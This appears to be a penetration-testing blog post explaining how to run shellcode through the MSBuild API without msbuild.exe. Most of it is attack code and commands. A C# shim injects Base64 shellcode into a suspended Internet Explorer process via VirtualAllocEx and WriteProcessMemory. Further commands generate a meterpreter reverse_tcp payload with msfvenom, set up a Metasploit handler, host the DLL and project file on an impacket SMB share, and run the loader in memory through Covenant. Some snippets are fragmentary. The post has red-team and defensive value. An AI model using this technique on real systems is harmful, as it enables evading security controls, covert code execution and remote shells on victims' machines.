MSBuild without MSBuild

MSBuild is a trusted Windows binary that is part of Microsoft .NET framework and can be utilized to build applications in environments where Visual Studio is not installed. From the perspective of security this binary should be removed from systems or blocked by an application whitelisting solution to prevent execution of arbitrary code that is stored in files that have the following extensions:

  • .csproj
  • xml

The capability of this binary to execute code that is stored on a system locally can lead to evasion of existing security controls (Group Policy, Application whitelisting etc.) that prevent PowerShell or other similar tooling that relies on PowerShell. However, MSBuild is no longer required to execute code since it is possible to use a .NET assembly that will call the malicious .csproj from a remote location (UNC path). This technique doesn’t leave any artifacts since it doesn’t touch the disk and the code is injected into a legitimate Windows process Internet Explorer.


The implementation of this technique requires a Shim DLL file that will create the Internet Explorer process in a suspended state, the C# project file that will contain the arbitrary code and the location of the target Internet Explorer process and the .NET assembly that will point to the UNC path of the C# project file. Specifically the attack is relied on the following files:

  • IEShim.dll
  • .csproj
  • MSBuildApiCaller.exe

Casey Smith released the necessary code to create the DLL and the schema of the .csproj file and Steve Borosh supplied the “MSBuildApiCaller” code on his GitHub repository together with the necessary files.

The file IEShim.dll is responsible to create the Internet Explorer process on the target system and to perform the injection of the shellcode into the address space of this process. The shellcode is expected to be in Base64 format.

public class ApcInjectionNewProcess


    public static void Exec(string a, string b)


        byte[] shellcode = System.Convert.FromBase64String(a);

The process will created in a suspended state.

        bool success = CreateProcess(processpath, null, 

            ref processSecurity, ref threadSecurity,


            ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | ProcessCreationFlags.CREATE_SUSPENDED, 

            IntPtr.Zero, null, ref si, out pi);

Two functions are used the “VirtualAllocEx” that will allocate memory within the virtual address space of “iexplore.exe” and the “WriteProcessMemory” to write the shellcode into the allocated space.

        IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_READWRITE);

        IntPtr bytesWritten = IntPtr.Zero;

        bool resultBool = WriteProcessMemory(pi.hProcess,resultPtr,shellcode,shellcode.Length, out bytesWritten);

The IEShim C# file can be converted into DLL by using the existing Microsoft compiler which is part of the .NET framework.

​​csc.exe /reference:"Microsoft.Build.Framework.dll";"Microsoft.Build.Tasks.v4.0.dll";"Microsoft.Build.Utilities.v4.0.dll" /target:library IEShim.cs

The “msbuildapicaller” C# file is responsible to load the project file from a remote location. The string “projectPath” requires modification in order to point to the shared folder hosting the file.

        static void Main(string[] args)


        string projectPath = "msbuildapicaller.csproj";



Similarly the compiler can convert the msbuildapicaller C# file to executable which will be loaded into the command and control framework for in-memory execution.

C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe /reference:"Microsoft.Build.Framework.dll";"Microsoft.Build.dll";"Microsoft.Build.Engine.dll";"Microsoft.Build.Utilities.v4.0.dll";"System.Runtime.dll" /target:exe msbuildapicaller.cs

Metasploit Framework utility “msfvenom” can generate payloads in various formats. The following command will produce a raw x64 payload which can be converted into base64 by using a utility which is part of Kali Linux.

​​msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o payload64.bin LHOST= LPORT=2000
​​base64 -i /root/payload64.bin > payload64.txt

Metasploit “multi/handler” module can capture the session once the shellcode is executed on the target system.

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 2000

The project file requires two modifications in the “MyCode” parameter that will contain the base64 shellcode and in the “AssemblyFile” that will point to the network location of the “IEShim.dll” file.

<Project xmlns="">

            <Target Name="MyTarget">


                MyCode='<Base64 Encoded x64 Shellcode>'

		        MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>


        <UsingTask TaskName="SimpleTask" AssemblyFile='\\\share\IEShim.dll' />


The “IEShim.dll” and the “msbuildapicaler.csproj” will be called from a UNC path therefore an SMB server is required to host these files. The following command will enable SMB server and the folder “msbuild” will be the shared folder that will contain the files.

impacket-smbserver pentestlab /msbuild -smb2support

Covenant command and control (C2) has the ability to execute .NET assembly binaries in memory similarly to Cobalt Strike “execute-assembly” command.

Assembly MSBuildApiCaller.exe

When the command will executed the Internet Explorer process will created on the target host and the shellcode will injected and executed inside the memory space of this process.

Reviewing the properties of the process will show that the current directory is the UNC path since the process was created from a remote location.

The following picture demonstrates the technique covered in this article in three steps:




If you are interested to learn more about how Pentest Laboratories and our custom cyber attack scenarios can improve your organisation readiness against cyber threats please contact us.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.